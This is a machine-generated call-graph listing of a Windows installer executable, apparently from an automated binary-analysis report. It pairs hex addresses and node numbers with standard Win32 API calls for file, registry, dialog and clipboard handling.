3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 